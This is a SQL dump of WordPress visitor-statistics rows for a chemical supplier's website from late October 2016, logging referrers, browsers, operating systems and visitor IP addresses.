INSERT INTO `wp_statistics_visitor` VALUES (11031, '2016-10-24', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiMooOLh_TPAhUIj2kKHZXtAwUYABAA&sig=AOD64_3ezBeIBy67l4iuzDUaIxDXBJtTMw&rct=j&q=&ved=0ahUKEwjM8P-Kh_TPAhUM7IMKHRkYDO0Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '12.109.19.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11032, '2016-10-24', 'https://www.bing.com/search?q=miller+stephenson+chemical&src=IE-SearchBox&FORM=IENTSR', 'MSIE', 'Windows', '11.0', '', '165.156.25.5', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11033, '2016-10-24', 'https://www.miller-stephenson.com/product/ms-580582/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.201.11.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11034, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.87.193.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11035, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '44.0.2403.125', '', '192.107.246.125', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11036, '2016-10-24', 'https://www.miller-stephenson.com/miller/epoxy.html', 'Chrome', 'Windows', '53.0.2785.143', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11037, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.248.197.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11038, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '62.210.148.87', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11039, '2016-10-24', 'https://mmr.mschem.com/miller/pdf/MS-122XD,%20143XD.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '130.64.25.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11040, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.71.228.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11041, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.167.218.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11042, '2016-10-24', 'https://search.yahoo.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.194.227.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11043, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '207.102.139.243', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11044, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '159.203.32.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11045, '2016-10-24', 'https://www.google.ca', 'Firefox', 'Windows', '40.0', '', '159.206.84.20', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11046, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.103', '', '174.78.176.42', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11047, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.170.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11048, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.224.224.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11049, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11050, '2016-10-24', 'https://www.evtechexpo.com/visit/exhibitor-list', 'Chrome', 'Windows', '33.0.1750.22', '', '103.16.104.249', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11051, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.220.235.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11052, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '45.3.88.164', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11053, '2016-10-24', 'https://www.google.co.il/', 'Chrome', 'Windows', '53.0.2785.143', '', '31.168.145.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11054, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.33.187.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11055, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11056, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.84.160.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11057, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.164.254.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11058, '2016-10-24', 'https://www.google.cl/', 'Chrome', 'Android', '43.0.2357.93', '', '201.219.233.190', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11059, '2016-10-24', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '132.212.151.191', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11060, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.85.140.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11061, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '172.58.41.71', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11062, '2016-10-24', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '49.0', '', '47.189.1.105', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11063, '2016-10-24', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.80.202.107', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11064, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11065, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwifrM2hk_TPAhWDOCYKHcW0C7oQFghaMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-207%2F&usg=AFQjCNG9Q8oiwU0nrjZTiDSbjwCgJYJwNA', 'MSIE', 'Windows', '11.0', '', '50.233.58.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11066, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '207.102.139.243', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11067, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.2', '', '216.113.160.77', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11068, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.124.152.38', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11069, '2016-10-24', 'https://www.miller-stephenson.com', 'BoogleBot2', 'Unknown', 'Unknown', '', '52.207.209.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11070, '2016-10-24', 'https://www.google.fr/', 'Firefox', 'Macintosh', '49.0', '', '176.146.169.86', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11071, '2016-10-24', 'https://r.search.yahoo.com/_ylt=AwrTHRXBXw5YyTcAvw5XNyoA;_ylu=X3oDMTEybXMwZmhwBGNvbG8DZ3ExBHBvcwMxBHZ0aWQDVUkyQzJfMQRzZWMDc3I-/RV=2/RE=1477365825/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=EES9wZhiiJIjHPb6P7M8QdXpNt8-', 'Edge', 'Windows', '14.14393', '', '97.105.25.246', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11072, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11073, '2016-10-24', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '164.67.160.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11074, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '208.67.23.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11075, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '12.162.185.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11076, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.234.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11077, '2016-10-24', 'https://www.google.ca/', 'Safari', 'iPad', '10.0', '', '216.223.141.154', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11078, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.31.106.34', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11079, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjzn5_HmfTPAhUKq1QKHXdKARUQFgiPATAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-222N%2C%2520222T.pdf&usg=AFQjCNFZCZI5wPs-cCRMQ4pGlbR-8wR9Tw&bvm=bv.136593572,d.cGw', 'MSIE', 'Windows', '11.0', '', '192.31.106.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11080, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.19.196.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11081, '2016-10-24', 'https://r.search.yahoo.com/_ylt=A0LEVvsBZQ5YY70AfSYnnIlQ;_ylu=X3oDMTEzdnB2ZmcwBGNvbG8DYmYxBHBvcwMxBHZ0aWQDRkZVSUMwXzEEc2VjA3Ny/RV=2/RE=1477367169/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=E.0qevlFLguahJa9oAGs3_eKx5I-', 'Firefox', 'Windows', '49.0', '', '24.15.1.125', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11082, '2016-10-24', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.37.123.58', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11083, '2016-10-24', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '4.16.62.226', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11084, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11085, '2016-10-24', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1219.TigkJXWst02LPXenxk5-0BFAV8iG_bsAX_q2zSXz8xwoqxawnCg6GogNHL4i0Zex.d80aa50c05a39b7729fc4f84f43a85862a9762fc&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YM1sNxN_KHOPADPyHdOKa1Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXdBQ1E3VkJaMGdpRUotb0JwdlYxNDRaT2xrMko5MkJOSndIY1lNWnhLbnhLUW50enJxQm5wWjJXZGpBeThYTm42bHhVZDdKUGY4ZWpnemY0VVhWWmhIU3lidjc2T1RKTQ&b64e=2&sign=46bcf16b2da41543df1a40343372c204&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96F6FlTMZdH9e5OUbbuncBSHnFLIRXvZKwdp4x3YmG9l1iH7z6AbJXwLyWBulqLIyv2R9P0oYC03GLisANWbTlu2Nzy_aUjNtZHm7MVqARTEk3jDx6m0TQWjYUmySN4wwly&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IETES6aHGuflNCjsX-QKxfIIQw1PM47HfYjHmgZeba_yS_SK-ZSVPlJUB_auR3GaNtUebmcsRsmkaKN9AuPcXIps&l10n=ru&cts=1477332768389&mc=3.75174228388', 'MSIE', 'Windows', '8.0', '', '37.204.200.136', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11086, '2016-10-24', 'https://www.google.com/afs/ads?q=dupont%20krytox%20lubricant&oe=utf-8&ie=utf-8&lo=false&adpage=1&adrep=4&r=m&fexp=2631602%2C21404&client=aj-shop-savvy&channel=5307&adtest=off&adsafe=medium&type=0&format=p4%7Cn5&ad=n5p4&nocache=2901477339935132&num=0&output=uds_ads_only&v=3&adlh=on&adext=as1%2Csr1&bsl=10&u_his=3&u_tz=-240&dt=1477339935135&u_w=960&u_h=540&biw=953&bih=439&psw=953&psh=439&frm=0&uio=uv3cs1vp1lo0va1cc0sr1sl1hC-lHst16sd13sv13sa13lt18ld16lv16da1-lhst16sd13sv13sa13lt18ld16lv16da1&jsv=58687&rurl=https%3A%2F%2Fwww.shop411.com%2Fshopping%3Fqsrc%3D999%26qo%3DsemQuery%26ad%3DsemD%26o%3D5307%26l%3Dsem%26askid%3De62fc2ac-af36-453c-8d13-43e424ff600c-0-sf_msb%26q%3Ddupont%2520krytox%2520lubricant%26dqi%3D%26am%3Dbroad%26an%3Dmsn_s&referer=httpss%3A%2F%2Fwww.bing.com%2F', 'Edge', 'Windows', '14.14393', '', '162.17.116.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11087, '2016-10-24', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/epoxy-polyacrylates/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.59.252.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11088, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.81.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11089, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11090, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '84.48.236.190', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11091, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '34.0.1847.116', '', '146.23.3.250', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11092, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '128.157.160.13', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11093, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '5.01', '', '86.104.139.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11094, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '174.125.13.254', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11095, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11096, '2016-10-24', 'https://www.google.com/search?client=safari&rls=en&q=curing+agent+W&ie=UTF-8&oe=UTF-8', 'Safari', 'Macintosh', '5.1.9', '', '107.185.29.144', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11097, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '93.115.29.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11098, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11099, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '69.89.27.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11100, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.180.114.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11101, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '185.4.75.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11102, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.70.48.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11103, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '38.0', '', '10.129.204.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11104, '2016-10-24', 'https://www.miller-stephenson.com/chemicals/solvents/', 'Safari', 'iPhone', '7.0', '', '157.55.12.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11105, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.146.32.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11106, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '69.195.77.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11107, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.94.246.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11108, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11109, '2016-10-24', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '75.170.73.66', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11110, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.8.142.82', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11111, '2016-10-24', 'https://www.google.co.uk/', 'Chrome', 'Android', '53.0.2785.124', '', '86.8.130.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11112, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.13.211.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11113, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '195.154.230.160', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11114, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.95.246.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11115, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.239.25.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11116, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.200.226.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11117, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '63.145.101.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11118, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.45.211.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11119, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '190.148.198.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11120, '2016-10-24', 'https://www.bing.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '86.179.210.181', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11121, '2016-10-24', 'https://www.miller-stephenson.com', 'Ruby', 'Unknown', 'Unknown', '', '104.154.65.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11122, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.82', '', '104.154.65.11', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11123, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.124.22.30', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11124, '2016-10-24', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjM0qayvfTPAhWHNoEKHdP0AakYABAL&sig=AOD64_1GmITKBKdCLlO8Is4T5taGCkGI0Q&rct=j&q=&ved=0ahUKEwi9hKOyvfTPAhUBTCYKHQKjAywQ0QwIOQ&adurl=', 'MSIE', 'Windows', '11.0', '', '72.188.111.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11125, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.50.196.136', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11126, '2016-10-24', 'https://www.spacetechexpo.com/visit/exhibitor-list-2017', 'Chrome', 'Windows', '53.0.2785.143', '', '106.51.21.97', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11127, '2016-10-24', 'https://www.miller-stephenson.com/category/krytox-articles/', 'MSIE', 'Windows', '9.0', '', '182.118.22.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11128, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.188.124.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11129, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.89.191.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11130, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '165.156.24.4', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11131, '2016-10-24', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '107.128.171.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11132, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '141.212.191.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11133, '2016-10-24', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '128.227.122.111', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11134, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.28.172.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11135, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.154.70.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11136, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '8.0', '', '91.134.1.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11137, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.216.166.131', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11138, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '204.210.117.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11139, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11140, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11141, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.190.171.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11142, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.74.108.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11143, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.148.146.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11144, '2016-10-24', 'https://life-instyle.com/', 'MSIE', 'Windows', '6.0', '', '46.119.119.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11145, '2016-10-24', 'https://www.google.com.au/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.220.181.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11146, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11147, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.197.194.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11148, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.6.183.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11149, '2016-10-24', 'https://www.miller-stephenson.com/wp-login.php', 'Firefox', 'Windows', '34.0', '', '37.6.190.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11150, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.14.99.69', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11151, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11152, '2016-10-25', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '184.163.189.248', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11153, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.101', '', '68.193.188.205', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11154, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.113.108.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11155, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.33.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11156, '2016-10-25', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '140.207.185.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11157, '2016-10-25', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11158, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/?orderby=menu_order', 'Chrome', 'Android', '38.0.2125.102', '', '198.223.230.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11159, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '86.34.7.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11160, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.124.88.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11161, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.19.22.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11162, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '191.252.46.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11163, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.134.11.60', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11164, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '97.79.238.221', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11165, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 4, 0); 
